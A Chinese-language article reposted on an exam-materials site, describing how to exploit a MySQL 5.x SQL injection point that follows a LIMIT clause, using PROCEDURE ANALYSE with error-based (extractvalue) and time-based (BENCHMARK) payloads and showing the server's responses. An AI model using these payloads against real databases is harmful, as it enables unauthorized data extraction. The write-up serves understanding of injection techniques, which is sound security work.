Mysql注入点在limit关键字后面的利用方法-范文、应用文-IT技术专栏-数据库-考试资料-在线学习网

网站首页汉语字词英语词汇考试资料写作素材旧版资料

标题	Mysql注入点在limit关键字后面的利用方法
内容	描写sql注入利用方法的文章数不胜数，本文将描述一种比较特殊的场景。 Mysql注入点在limit关键字后面的利用方法细节在一次测试中，我碰到了一个sql注入的问题，在网上没有搜到解决办法，当时的注入点是在limit关键字后面，数据库是MySQL5.x,SQL语句类似下面这样： SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 【注入点】问题的关键在于，语句中有order by 关键字，我们知道，mysql 中在order by 前面可以使用union 关键字，所以如果注入点前面没有order by 关键字，就可以顺利的使用union 关键字，但是现在的情况是，注入点前面有order by 关键字，这个问题在stackoverflow 上和sla.ckers上都有讨论，但是都没有什么有效的解决办法。我们先看看 mysql 5.x 的文档中的 select 的语法： SELECT [ALL \| DISTINCT \| DISTINCTROW ] [HIGH_PRIORITY] [STRAIGHT_JOIN] [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT] [SQL_CACHE \| SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS] select_expr [, select_expr ...] [FROM table_references [WHERE where_condition] [GROUP BY {col_name \| expr \| position} [ASC \| DESC], ... [WITH ROLLUP]] [HAVING where_condition] [ORDER BY {col_name \| expr \| position} [ASC \| DESC], ...] [LIMIT {[offset,] row_count \| row_count OFFSET offset}] [PROCEDURE procedure_name(argument_list)] [INTO OUTFILE 'file_name' export_options \| INTO DUMPFILE 'file_name' \| INTO var_name [, var_name]] [FOR UPDATE \| LOCK IN SHARE MODE]] limit 关键字后面还有 PROCEDURE 和 INTO 关键字，into 关键字可以用来写文件，但这在本文中不重要，这里的重点是 PROCEDURE 关键字.MySQL默认可用的存储过程只有 ANALYSE (doc)。尝试用这个存储过程： mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1); ERROR 1386 (HY000): Can't use ORDER clause with this procedure ANALYSE支持两个参数，试试两个参数： mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1); ERROR 1386 (HY000): Can't use ORDER clause with this procedure 依然无效，尝试在 ANALYSE 中插入 sql 语句： mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1); 响应如下： ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse’ 事实证明，sleep 没有被执行，最终，我尝试了如下payload ： mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1' 啊哈，上面的方法就是常见的报错注入，所以，如果注入点支持报错，那所有问题都ok，但是如果注入点不是报错的，还可以使用 time-based 的注入，payload 如下： SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1) 有意思的是，这里不能用sleep而只能用 BENCHMARK。另外，这里还有一种类似的方法 https://rdot.org/forum/showpost.php?p=36186&postcount=30
随便看	2014年下半年益阳市赫山区事业单位招聘考试综合成绩及排名情况公示 2014年重庆九龙坡区第一人民医院急聘儿科新生儿科医师启事中华人民共和国友谊关口岸国际道路运输管理处更正广西2014年招聘部分人员名单公告内蒙古自治区交通运输厅2014年度所属事业单位招聘工作人员拟聘用人员进行公示公告 2014年内蒙古自治区文化厅所属事业单位招聘考试总成绩 2014年益阳市赫山区考选基层司法助理员等笔试成绩公示 2014年山东省政府第六届省督学拟聘人选公示 2014年广州市天河区财政投资评审中心招聘编制外评审人员拟聘用人员公示三门峡灵宝市2014年专业技术人才招聘面试成绩公示濮阳市2014年部分市直事业单位招聘人员公告新疆2014年昌吉州公安机关招聘事业编制专业巡逻防控队员第一批体检合格人员名单通知 2014年西安市新城检察院面向陕西警官职业学院招聘启事张家界市武陵源旅游产业发展有限公司2014年招聘工作人员面试入围人员名单公示厦门长庚医院护理部2014年10月27日护士甄选结果暨体检通知 2014年漳州市平和县拟聘用事业单位工作人员公示(4) 2014年西安外国语大学保卫处招聘启事 2014年云浮市云安县医疗卫生和计生事业单位补招卫生技术人员名单公示宜宾市翠屏区2014年考调市政设施管理人员公告 2014年厦门理工学院简化程序拟聘用人员公示10.29 新疆2014年阿勒泰地区公安机关招聘事业编制专业巡逻防控人员第二批进入考察环节人员名单公告 2014年云浮市云安县农业局属下事业单位招聘事业编制工作人员公告 2014年云浮市云安县农业局属下事业单位招聘事业编制工作人员岗位表海南省2014年临高县招聘事业单位工作人员面试公告 2014年上海市松江区10批次部分事业单位非编派遣制工作人员笔试成绩公示 2014年湖南邵阳市大圳灌区管理局所属事业单位招聘事业编制工作人员启事 brief discussion brief duration briefed brief encounter brief essay brief exchange brief explanation brief exposure brief glance brief hiatus 厄莎厄运厄难厅厅事厅堂厅子厅房历历高中英语个人计划总结学校心理咨询室工作计划（10篇）如何科学写个人工作计划安排（十篇）如何科学制定个人工作计划格式（20篇）物业公司2022年工作计划安排（通用20篇） 2022年教师个人教学工作计划（20篇） 2022年的教师个人工作计划（20篇）幼儿园中班教师个人工作计划（15篇）售后岗位工作计划暑假个人发展计划表

在线学习网考试资料包含高考、自考、专升本考试、人事考试、公务员考试、大学生村官考试、特岗教师招聘考试、事业单位招聘考试、企业人才招聘、银行招聘、教师招聘、农村信用社招聘、各类资格证书考试等各类考试资料。